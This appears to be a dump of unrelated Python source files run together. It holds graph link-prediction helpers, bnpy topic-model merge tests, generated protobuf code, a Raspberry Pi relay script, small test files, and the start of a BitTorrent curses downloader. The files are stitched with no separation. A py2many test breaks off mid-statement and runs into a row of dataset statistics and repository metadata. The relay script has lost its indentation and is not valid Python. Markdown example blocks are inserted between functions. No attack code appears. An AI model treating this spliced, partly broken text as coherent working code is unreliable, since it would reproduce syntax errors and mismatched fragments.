    return vtype if stype == utype else utype
def filter_pairs(test_pairs, test_labels, pair_filter):
    '''
    :param test_pairs: Node pairs.
    :param test_labels: Labels.
    :param pair_filter: Filter set.
    :return: test_pairs and test_labels that do not exist in pair_filter
    '''
    new_pairs = []
    new_labels = []
    for pair, label in zip(test_pairs, test_labels):
        if tuple(pair) not in pair_filter:
            new_pairs.append(pair)
            new_labels.append(label)
    return new_pairs, new_labels  # return the filtered lists, not the unfiltered inputs
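# A minimal, self-contained check of the intended filtering behaviour, with
# made-up pairs and labels. The function body is duplicated here so the snippet
# runs on its own; note the filter holds tuples while the pairs are lists,
# matching the tuple(pair) lookup.

```python
def filter_pairs(test_pairs, test_labels, pair_filter):
    # Keep only pairs (and their labels) that are not in pair_filter.
    new_pairs, new_labels = [], []
    for pair, label in zip(test_pairs, test_labels):
        if tuple(pair) not in pair_filter:
            new_pairs.append(pair)
            new_labels.append(label)
    return new_pairs, new_labels

pairs = [['u1', 'r', 'v1'], ['u2', 'r', 'v2']]
labels = [1, 0]
kept_pairs, kept_labels = filter_pairs(pairs, labels, {('u1', 'r', 'v1')})
print(kept_pairs, kept_labels)  # [['u2', 'r', 'v2']] [0]
```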
def make_train_data(G, edge_type, ntr, nvl, nts, steps=3, neg=5):
    """
    :param G: NetworkX graph.
    :param edge_type: Edge type.
    :param ntr: Number of positive training pairs.
    :param nvl: Number of positive validation pairs.
    :param nts: Number of positive test pairs.
    :param steps: Maximum path length.
    :param neg: Negative samples per positive edge.
    :return: train/validation/test pairs and labels, plus the path dictionary T.
    """
    utype, vtype = find_node_types(G, edge_type)
    sel_edges = rnd.sample([[e[0], edge_type, e[1]] for e in G.edges if G[e[0]][e[1]][e[2]]['type'] == edge_type
                            and G.nodes[e[0]]['type'] == utype and G.nodes[e[1]]['type'] == vtype], ntr + nvl + nts)
    train_pairs = sel_edges[0:ntr]
    train_pairs, train_labels = add_neg_samples(G, train_pairs, neg, steps)
    T_tr = find_pair_paths(G, train_pairs, steps)
    val_pairs = sel_edges[ntr:ntr + nvl]
    val_pairs, val_labels = add_neg_samples(G, val_pairs, neg, steps)
    T_vl = find_pair_paths(G, val_pairs, steps)
    test_pairs = sel_edges[ntr + nvl:ntr + nvl + nts]
    test_pairs, test_labels = add_neg_samples(G, test_pairs, neg, steps)
    pair_filter = set([(u, r, v) for u, r, v in train_pairs + val_pairs])
    test_pairs, test_labels = filter_pairs(test_pairs, test_labels, pair_filter)
    T_ts = find_pair_paths(G, test_pairs, steps)
    T = add_Ts(T_ts, add_Ts(T_tr, T_vl))
    return train_pairs, train_labels, val_pairs, val_labels, test_pairs, test_labels, T
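# The train/validation/test split above is plain list slicing over a shuffled
# edge sample. A standard-library sketch with a toy edge list (node and relation
# names are hypothetical):

```python
import random

edges = [('u%d' % i, 'likes', 'v%d' % i) for i in range(10)]
ntr, nvl, nts = 5, 3, 2
rng = random.Random(0)
sel = rng.sample(edges, ntr + nvl + nts)  # draw ntr+nvl+nts edges without replacement
train = sel[0:ntr]
val = sel[ntr:ntr + nvl]
test = sel[ntr + nvl:ntr + nvl + nts]
print(len(train), len(val), len(test))  # 5 3 2
```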
# --- refinery/bnpy/bnpy-dev/tests/merge/TestMergeHDPTopicModel.py (repo: csa0001/Refinery, MIT license) ---
'''
Unit tests for MergeMove.py for HDPTopicModels
Verification merging works as expected and produces valid models.
Attributes
------------
self.Data : K=4 simple WordsData object from AbstractBaseTestForHDP
self.hmodel : K=4 simple bnpy model from AbstractBaseTestForHDP
Coverage
-----------
* run_many_merge_moves
* fails to merge away any true comps
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
* run_merge_move
* fails to merge away any true comps
* successfully merges away all duplicated comps when targeted specifically
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
success rate > 95%
'''
import numpy as np
import unittest
from AbstractBaseTestForHDP import AbstractBaseTestForHDP
import bnpy
from bnpy.learnalg import MergeMove
from scipy.special import digamma
import copy
class TestMergeHDP(AbstractBaseTestForHDP):
    def getSuffStatsPrepForMerge(self, hmodel):
        ''' With merge flags ENABLED,
            run Estep, calc suff stats, then do an Mstep
        '''
        LP = hmodel.calc_local_params(self.Data)
        flagDict = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
        SS = hmodel.get_global_suff_stats(self.Data, LP, **flagDict)
        hmodel.update_global_params(SS)
        return LP, SS
    ######################################################### Test many moves
    #########################################################
    def test_run_many_merge_moves_trueModel_random(self):
        LP, SS = self.getSuffStatsPrepForMerge(self.hmodel)
        PRNG = np.random.RandomState(0)
        mergeKwArgs = dict(mergename='random')
        a, b, c, MTracker = MergeMove.run_many_merge_moves(self.hmodel,
                                self.Data, SS,
                                nMergeTrials=100, randstate=PRNG,
                                **mergeKwArgs)
        assert MTracker.nTrial == SS.K * (SS.K - 1) / 2
        assert MTracker.nSuccess == 0
    def test_run_many_merge_moves_dupModel_random(self):
        self.MakeModelWithDuplicatedComps()
        LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
        PRNG = np.random.RandomState(0)
        mergeKwArgs = dict(mergename='random')
        a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
                                self.Data, SS,
                                nMergeTrials=100, randstate=PRNG,
                                **mergeKwArgs)
        assert MTracker.nSuccess == 4
        assert (0, 4) in MTracker.acceptedOrigIDs
        assert (1, 5) in MTracker.acceptedOrigIDs
        assert (2, 6) in MTracker.acceptedOrigIDs
        assert (3, 7) in MTracker.acceptedOrigIDs
    def test_run_many_merge_moves_dupModel_marglik(self):
        self.MakeModelWithDuplicatedComps()
        LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
        PRNG = np.random.RandomState(456)
        mergeKwArgs = dict(mergename='marglik')
        a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
                                self.Data, SS,
                                nMergeTrials=100, randstate=PRNG,
                                **mergeKwArgs)
        for msg in MTracker.InfoLog:
            print msg
        assert MTracker.nSuccess == 4
        assert MTracker.nTrial == 4
        assert (0, 4) in MTracker.acceptedOrigIDs
        assert (1, 5) in MTracker.acceptedOrigIDs
        assert (2, 6) in MTracker.acceptedOrigIDs
        assert (3, 7) in MTracker.acceptedOrigIDs
    ######################################################### run_merge_move
    ######################################################### full tests
    def test_model_matches_ground_truth_as_precheck(self):
        ''' Verify HDPmodel is able to learn ground truth parameters
            and maintain stable estimates after several E/M steps
        '''
        np.set_printoptions(precision=3, suppress=True)
        # Advance the model several iterations
        for rr in range(5):
            self.run_Estep_then_Mstep()
        for k in range(self.hmodel.obsModel.K):
            logtopicWordHat = self.hmodel.obsModel.comp[k].Elogphi
            topicWordHat = np.exp(logtopicWordHat)
            diffVec = np.abs(topicWordHat - self.Data.TrueParams['topics'][k])
            print diffVec
            print ' '
            assert np.max(diffVec) < 0.04
    ######################################################### run_merge_move
    ######################################################### full tests
    def test_run_merge_move_on_true_comps_fails(self):
        ''' Should not be able to merge "true" components into one another
            Each is necessary to explain (some) data
        '''
        mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
        LP = self.hmodel.calc_local_params(self.Data)
        SS = self.hmodel.get_global_suff_stats(self.Data, LP, **mergeFlags)
        for trial in range(10):
            newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.hmodel, self.Data, SS, mergename='random')
            assert newModel.allocModel.K == self.hmodel.allocModel.K
            assert newModel.obsModel.K == self.hmodel.obsModel.K

    def test_run_merge_move_on_dup_comps_succeeds_with_each_ideal_pair(self):
        ''' Given the duplicated comps model,
            which has a redundant copy of each "true" component,
            we show that deliberately merging each pair does succeed.
            This is "ideal" since we know in advance which merge pair to try
        '''
        self.MakeModelWithDuplicatedComps()
        mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
        LP = self.dupModel.calc_local_params(self.Data)
        SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
        for kA in [0, 1, 2, 3]:
            kB = kA + 4  # Ktrue=4, so kA's best match is kA+4
            newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
                                self.Data, SS, kA=kA, kB=kB)
            print MoveInfo['msg']
            assert newModel.allocModel.K == self.dupModel.allocModel.K - 1
            assert newModel.obsModel.K == self.dupModel.obsModel.K - 1
            assert MoveInfo['didAccept'] == 1
    def test_run_merge_move_on_dup_comps_fails_with_nonideal_pairs(self):
        ''' Given the duplicated comps model,
            which has a redundant copy of each "true" component,
            we show that merging any non-matching pair is rejected.
        '''
        self.MakeModelWithDuplicatedComps()
        mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
        LP = self.dupModel.calc_local_params(self.Data)
        SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
        for Kstep in [1, 2, 3, 5, 6, 7]:
            for kA in range(8 - Kstep):
                kB = kA + Kstep
                newM, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
                                    self.Data, SS, kA=kA, kB=kB)
                print MoveInfo['msg']
                assert MoveInfo['didAccept'] == 0
    def test_run_merge_move_on_dup_comps_succeeds_with_all_ideal_pairs(self):
        self.MakeModelWithDuplicatedComps()
        mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
        LP = self.dupModel.calc_local_params(self.Data)
        SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
        myModel = self.dupModel.copy()
        for kA in [3, 2, 1, 0]:  # descend backwards so indexing still works
            kB = kA + 4  # Ktrue=4, so kA's best match is kA+4
            myModel, SS, newEv, MoveInfo = MergeMove.run_merge_move(myModel,
                                self.Data, SS, kA=kA, kB=kB)
            print MoveInfo['msg']
            assert MoveInfo['didAccept'] == 1
    def test_run_merge_move_on_dup_comps_succeeds_with_random_choice(self):
        ''' Consider Duplicated Comps model.
            Out of (8 choose 2) = 28 possible pairs,
            exactly 4 produce sensible merges.
            Verify that over many random trials where kA,kB drawn uniformly,
            we obtain a success rate not too different from 4 / 28 = 0.142857
        '''
        self.MakeModelWithDuplicatedComps()
        mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
        LP = self.dupModel.calc_local_params(self.Data)
        SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
        nTrial = 100
        nSuccess = 0
        PRNG = np.random.RandomState(0)
        for trial in range(nTrial):
            newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='random', randstate=PRNG)
            if MoveInfo['didAccept']:
                print MoveInfo['msg']
                nSuccess += 1
        assert nSuccess > 0
        rate = float(nSuccess) / float(nTrial)
        print "Expected rate: .1428"
        print "Measured rate: %.3f" % (rate)
        assert rate > 0.1
        assert rate < 0.2
    def test_run_merge_move_on_dup_comps_succeeds_with_marglik_choice(self):
        ''' Consider Duplicated Comps model.
            Use marglik criteria to select candidates kA, kB.
            Verify that the merge accept rate is much higher than at random.
            The accept rate should actually be near perfect!
        '''
        self.MakeModelWithDuplicatedComps()
        mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
        LP = self.dupModel.calc_local_params(self.Data)
        SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
        nTrial = 100
        nSuccess = 0
        PRNG = np.random.RandomState(0)
        for trial in range(nTrial):
            newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='marglik', randstate=PRNG)
            print MoveInfo['msg']
            if MoveInfo['didAccept']:
                nSuccess += 1
        assert nSuccess > 0
        rate = float(nSuccess) / float(nTrial)
        print "Expected rate: >.95"
        print "Measured rate: %.3f" % (rate)
        assert rate > 0.95
# --- bluzelle/codec/crud/Paging_pb2.py (repo: hhio618/bluezelle-py, MIT license) ---
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: crud/Paging.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
    name="crud/Paging.proto",
    package="bluzelle.curium.crud",
    syntax="proto3",
    serialized_options=b"Z'github.com/bluzelle/curium/x/crud/types",
    create_key=_descriptor._internal_create_key,
    serialized_pb=b'\n\x11\x63rud/Paging.proto\x12\x14\x62luzelle.curium.crud"0\n\rPagingRequest\x12\x10\n\x08startKey\x18\x01 \x01(\t\x12\r\n\x05limit\x18\x02 \x01(\x04"0\n\x0ePagingResponse\x12\x0f\n\x07nextKey\x18\x01 \x01(\t\x12\r\n\x05total\x18\x02 \x01(\x04\x42)Z\'github.com/bluzelle/curium/x/crud/typesb\x06proto3',
)
_PAGINGREQUEST = _descriptor.Descriptor(
    name="PagingRequest",
    full_name="bluzelle.curium.crud.PagingRequest",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="startKey",
            full_name="bluzelle.curium.crud.PagingRequest.startKey",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="limit",
            full_name="bluzelle.curium.crud.PagingRequest.limit",
            index=1,
            number=2,
            type=4,
            cpp_type=4,
            label=1,
            has_default_value=False,
            default_value=0,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=43,
    serialized_end=91,
)
_PAGINGRESPONSE = _descriptor.Descriptor(
    name="PagingResponse",
    full_name="bluzelle.curium.crud.PagingResponse",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="nextKey",
            full_name="bluzelle.curium.crud.PagingResponse.nextKey",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="total",
            full_name="bluzelle.curium.crud.PagingResponse.total",
            index=1,
            number=2,
            type=4,
            cpp_type=4,
            label=1,
            has_default_value=False,
            default_value=0,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=93,
    serialized_end=141,
)
DESCRIPTOR.message_types_by_name["PagingRequest"] = _PAGINGREQUEST
DESCRIPTOR.message_types_by_name["PagingResponse"] = _PAGINGRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PagingRequest = _reflection.GeneratedProtocolMessageType(
    "PagingRequest",
    (_message.Message,),
    {
        "DESCRIPTOR": _PAGINGREQUEST,
        "__module__": "crud.Paging_pb2"
        # @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingRequest)
    },
)
_sym_db.RegisterMessage(PagingRequest)
PagingResponse = _reflection.GeneratedProtocolMessageType(
    "PagingResponse",
    (_message.Message,),
    {
        "DESCRIPTOR": _PAGINGRESPONSE,
        "__module__": "crud.Paging_pb2"
        # @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingResponse)
    },
)
_sym_db.RegisterMessage(PagingResponse)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
# --- terminal.py (repo: TeknohouseID/rumah_aria_graha_NEW_2018, Unlicense) ---
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
pin_terminal = [15,16] #definisi pin GPIO yg terhubung ke relay terminal
GPIO.setup(pin_terminal, GPIO.OUT)
def terminal_on(pin): #fungsi untuk menyalakan lampu (NC)
GPIO.output(pin, 1)
def terminal_off(pin): #fungsi untuk mematikan lampu (NC)
GPIO.output(pin, 0)
#Coded by Faisal Candrasyah H, Founder Teknohouse.ID, Co-founder and former CTO of Indisbuilding
#pin 15 = relay 4 = dispenser_cewek
#pin 16 = relay 5 = dispenser_cowok
# --- tests/test__init__.py (repo: Combofoods/pyenv, MIT license) ---
import pytest
import envpy
import os
folder = os.path.dirname(__file__)
folder_env_file = f'{folder}/resources'
file_dot_env = 'test.env'
def test__init__():
    karg = {'filepath': folder_env_file, 'filename': file_dot_env}
    envpy.get_variables(**karg)
    envpy.printenv(envpy.get_variables(**karg))

if __name__ == "__main__":
    test__init__()

# --- tests/cases/infer.py (repo: div72/py2many, MIT license) ---
#!/usr/bin/env python3
def foo():
    a = 10
    # infer that b is an int
    b = a
    assert b == 10
    print(b)

if __name__ == "__main__":
| 11.214286 | 28 | 0.509554 | 25 | 157 | 2.88 | 0.76 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04902 | 0.350318 | 157 | 13 | 29 | 12.076923 | 0.656863 | 0.280255 | 0 | 0 | 0 | 0 | 0.072072 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.142857 | 0.142857 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4dc9a387c6801eebbce5ef0b1a99718dbb8697f | 17,584 | py | Python | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | #!/usr/bin/env python
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Original version written by Henry 'Pi' James, modified by (at least)
# John Hoffman and Uoti Urpala
from __future__ import division
from BitTorrent.platform import install_translation
install_translation()
SPEW_SCROLL_RATE = 1
import sys
import os
import threading
from time import time, strftime
from BitTorrent.download import Feedback, Multitorrent
from BitTorrent.defaultargs import get_defaults
from BitTorrent.parseargs import printHelp
from BitTorrent.zurllib import urlopen
from BitTorrent.bencode import bdecode
from BitTorrent.ConvertedMetainfo import ConvertedMetainfo
from BitTorrent.prefs import Preferences
from BitTorrent.obsoletepythonsupport import import_curses
from BitTorrent import configfile
from BitTorrent import BTFailure
from BitTorrent import version
from BitTorrent import GetTorrent
try:
    curses = import_curses()
    import curses.panel
    from curses.wrapper import wrapper as curses_wrapper
    from signal import signal, SIGWINCH
except:
    print _("Textmode GUI initialization failed, cannot proceed.")
    print
    print _("This download interface requires the standard Python module "
            "\"curses\", which is unfortunately not available for the native "
            "Windows port of Python. It is however available for the Cygwin "
            "port of Python, running on all Win32 systems (www.cygwin.com).")
    print
    print _('You may still use "bittorrent-console" to download.')
    sys.exit(1)
def fmttime(n):
    if n == 0:
        return _("download complete!")
    try:
        n = int(n)
        assert n >= 0 and n < 5184000  # 60 days
    except:
        return _("<unknown>")
    m, s = divmod(n, 60)
    h, m = divmod(m, 60)
    return _("finishing in %d:%02d:%02d") % (h, m, s)
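# The divmod chain above converts seconds to h:mm:ss. A standalone Python 3
# sketch of the same arithmetic, without the gettext _() wrapper and the
# 60-day sanity check:

```python
def fmttime(n):
    # seconds -> (hours, minutes, seconds) via two divmods
    m, s = divmod(int(n), 60)
    h, m = divmod(m, 60)
    return "finishing in %d:%02d:%02d" % (h, m, s)

print(fmttime(3725))  # finishing in 1:02:05
```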
def fmtsize(n):
    s = str(n)
    size = s[-3:]
    while len(s) > 3:
        s = s[:-3]
        size = '%s,%s' % (s[-3:], size)
    if n > 999:
        unit = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
        i = 1
        while i + 1 < len(unit) and (n >> 10) >= 999:
            i += 1
            n >>= 10
        n /= (1 << 10)
        size = '%s (%.0f %s)' % (size, n, unit[i])
    return size
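# A Python 3 transcription of the same formatting: a thousands-separated byte
# count plus a rounded binary-unit summary. Behaviour matches the original
# because that file imports true division from __future__.

```python
def fmtsize(n):
    s = str(n)
    size = s[-3:]
    while len(s) > 3:          # insert thousands separators right-to-left
        s = s[:-3]
        size = '%s,%s' % (s[-3:], size)
    if n > 999:
        unit = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
        i = 1
        while i + 1 < len(unit) and (n >> 10) >= 999:
            i += 1
            n >>= 10           # step up a unit while >= 999 of the next one
        n /= (1 << 10)
        size = '%s (%.0f %s)' % (size, n, unit[i])
    return size

print(fmtsize(2048))     # 2,048 (2 KiB)
print(fmtsize(1234567))  # 1,234,567 (1 MiB)
```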
class CursesDisplayer(object):
    def __init__(self, scrwin, errlist, doneflag, reread_config, ulrate):
        self.scrwin = scrwin
        self.errlist = errlist
        self.doneflag = doneflag
        signal(SIGWINCH, self.winch_handler)
        self.changeflag = threading.Event()
        self.done = False
        self.reread_config = reread_config
        self.ulrate = ulrate
        self.activity = ''
        self.status = ''
        self.progress = ''
        self.downRate = '---'
        self.upRate = '---'
        self.shareRating = ''
        self.seedStatus = ''
        self.peerStatus = ''
        self.errors = []
        self.file = ''
        self.downloadTo = ''
        self.fileSize = ''
        self.numpieces = 0
        self.spew_scroll_time = 0
        self.spew_scroll_pos = 0
        self._remake_window()
        curses.use_default_colors()
    def set_torrent_values(self, name, path, size, numpieces):
        self.file = name
        self.downloadTo = path
        self.fileSize = fmtsize(size)
        self.numpieces = numpieces
        self._remake_window()
    def winch_handler(self, signum, stackframe):
        self.changeflag.set()
        curses.endwin()
        self.scrwin.refresh()
        self.scrwin = curses.newwin(0, 0, 0, 0)
        self._remake_window()
    def _remake_window(self):
        self.scrh, self.scrw = self.scrwin.getmaxyx()
        self.scrpan = curses.panel.new_panel(self.scrwin)
        self.labelh, self.labelw, self.labely, self.labelx = 11, 9, 1, 2
        self.labelwin = curses.newwin(self.labelh, self.labelw,
                                      self.labely, self.labelx)
        self.labelpan = curses.panel.new_panel(self.labelwin)
        self.fieldh, self.fieldw, self.fieldy, self.fieldx = (
            self.labelh, self.scrw - 2 - self.labelw - 3,
            1, self.labelw + 3)
        self.fieldwin = curses.newwin(self.fieldh, self.fieldw,
                                      self.fieldy, self.fieldx)
        self.fieldwin.nodelay(1)
        self.fieldpan = curses.panel.new_panel(self.fieldwin)
        self.spewh, self.speww, self.spewy, self.spewx = (
            self.scrh - self.labelh - 2, self.scrw - 3, 1 + self.labelh, 2)
        self.spewwin = curses.newwin(self.spewh, self.speww,
                                     self.spewy, self.spewx)
        self.spewpan = curses.panel.new_panel(self.spewwin)
        try:
            self.scrwin.border(ord('|'), ord('|'), ord('-'), ord('-'),
                               ord(' '), ord(' '), ord(' '), ord(' '))
        except:
            pass
        self.labelwin.addstr(0, 0, _("file:"))
        self.labelwin.addstr(1, 0, _("size:"))
        self.labelwin.addstr(2, 0, _("dest:"))
        self.labelwin.addstr(3, 0, _("progress:"))
        self.labelwin.addstr(4, 0, _("status:"))
        self.labelwin.addstr(5, 0, _("dl speed:"))
        self.labelwin.addstr(6, 0, _("ul speed:"))
        self.labelwin.addstr(7, 0, _("sharing:"))
        self.labelwin.addstr(8, 0, _("seeds:"))
        self.labelwin.addstr(9, 0, _("peers:"))
        curses.panel.update_panels()
        curses.doupdate()
        self.changeflag.clear()
    def finished(self):
        self.done = True
        self.downRate = '---'
        self.display({'activity': _("download succeeded"), 'fractionDone': 1})

    def error(self, errormsg):
        newerrmsg = strftime('[%H:%M:%S] ') + errormsg
        self.errors.append(newerrmsg.split('\n')[0])
        self.errlist.append(newerrmsg)
        self.display({})
def display(self, statistics):
fractionDone = statistics.get('fractionDone')
activity = statistics.get('activity')
timeEst = statistics.get('timeEst')
downRate = statistics.get('downRate')
upRate = statistics.get('upRate')
spew = statistics.get('spew')
inchar = self.fieldwin.getch()
if inchar == 12: # ^L
self._remake_window()
elif inchar in (ord('q'),ord('Q')):
self.doneflag.set()
elif inchar in (ord('r'),ord('R')):
self.reread_config()
elif inchar in (ord('u'),ord('U')):
curses.echo()
self.fieldwin.nodelay(0)
s = self.fieldwin.getstr(6,10)
curses.noecho()
self.fieldwin.nodelay(1)
r = None
try:
r = int(s)
except ValueError:
pass
if r is not None:
self.ulrate(r)
if timeEst is not None:
self.activity = fmttime(timeEst)
elif activity is not None:
self.activity = activity
if self.changeflag.isSet():
return
if fractionDone is not None:
blocknum = int(self.fieldw * fractionDone)
self.progress = blocknum * '#' + (self.fieldw - blocknum) * '_'
self.status = '%s (%.1f%%)' % (self.activity, fractionDone * 100)
if downRate is not None:
self.downRate = '%.1f KB/s' % (downRate / (1 << 10))
if upRate is not None:
self.upRate = '%.1f KB/s' % (upRate / (1 << 10))
downTotal = statistics.get('downTotal')
if downTotal is not None:
upTotal = statistics['upTotal']
if downTotal <= upTotal / 100:
self.shareRating = _("oo (%.1f MB up / %.1f MB down)") % (
upTotal / (1<<20), downTotal / (1<<20))
else:
self.shareRating = _("%.3f (%.1f MB up / %.1f MB down)") % (
upTotal / downTotal, upTotal / (1<<20), downTotal / (1<<20))
numCopies = statistics['numCopies']
nextCopies = ', '.join(["%d:%.1f%%" % (a,int(b*1000)/10) for a,b in
zip(xrange(numCopies+1, 1000), statistics['numCopyList'])])
if not self.done:
self.seedStatus = _("%d seen now, plus %d distributed copies "
"(%s)") % (statistics['numSeeds'],
statistics['numCopies'],
nextCopies)
else:
self.seedStatus = _("%d distributed copies (next: %s)") % (
statistics['numCopies'], nextCopies)
self.peerStatus = _("%d seen now") % statistics['numPeers']
self.fieldwin.erase()
self.fieldwin.addnstr(0, 0, self.file, self.fieldw, curses.A_BOLD)
self.fieldwin.addnstr(1, 0, self.fileSize, self.fieldw)
self.fieldwin.addnstr(2, 0, self.downloadTo, self.fieldw)
if self.progress:
self.fieldwin.addnstr(3, 0, self.progress, self.fieldw, curses.A_BOLD)
self.fieldwin.addnstr(4, 0, self.status, self.fieldw)
self.fieldwin.addnstr(5, 0, self.downRate, self.fieldw)
self.fieldwin.addnstr(6, 0, self.upRate, self.fieldw)
self.fieldwin.addnstr(7, 0, self.shareRating, self.fieldw)
self.fieldwin.addnstr(8, 0, self.seedStatus, self.fieldw)
self.fieldwin.addnstr(9, 0, self.peerStatus, self.fieldw)
self.spewwin.erase()
if not spew:
errsize = self.spewh
if self.errors:
self.spewwin.addnstr(0, 0, _("error(s):"), self.speww, curses.A_BOLD)
errsize = len(self.errors)
displaysize = min(errsize, self.spewh)
displaytop = errsize - displaysize
for i in range(displaysize):
self.spewwin.addnstr(i, self.labelw, self.errors[displaytop + i],
self.speww-self.labelw-1, curses.A_BOLD)
else:
if self.errors:
self.spewwin.addnstr(0, 0, _("error:"), self.speww, curses.A_BOLD)
self.spewwin.addnstr(0, self.labelw, self.errors[-1],
self.speww-self.labelw-1, curses.A_BOLD)
self.spewwin.addnstr(2, 0, _(" # IP Upload Download Completed Speed"), self.speww, curses.A_BOLD)
if self.spew_scroll_time + SPEW_SCROLL_RATE < time():
self.spew_scroll_time = time()
if len(spew) > self.spewh-5 or self.spew_scroll_pos > 0:
self.spew_scroll_pos += 1
if self.spew_scroll_pos > len(spew):
self.spew_scroll_pos = 0
for i in range(len(spew)):
spew[i]['lineno'] = i+1
spew.append({'lineno': None})
spew = spew[self.spew_scroll_pos:] + spew[:self.spew_scroll_pos]
for i in range(min(self.spewh - 5, len(spew))):
if not spew[i]['lineno']:
continue
self.spewwin.addnstr(i+3, 0, '%3d' % spew[i]['lineno'], 3)
self.spewwin.addnstr(i+3, 4, spew[i]['ip'], 15)
ul = spew[i]['upload']
if ul[1] > 100:
self.spewwin.addnstr(i+3, 20, '%6.0f KB/s' % (
ul[1] / 1000), 11)
self.spewwin.addnstr(i+3, 32, '-----', 5)
if ul[2]:
self.spewwin.addnstr(i+3, 33, 'I', 1)
if ul[3]:
self.spewwin.addnstr(i+3, 35, 'C', 1)
dl = spew[i]['download']
if dl[1] > 100:
self.spewwin.addnstr(i+3, 38, '%6.0f KB/s' % (
dl[1] / 1000), 11)
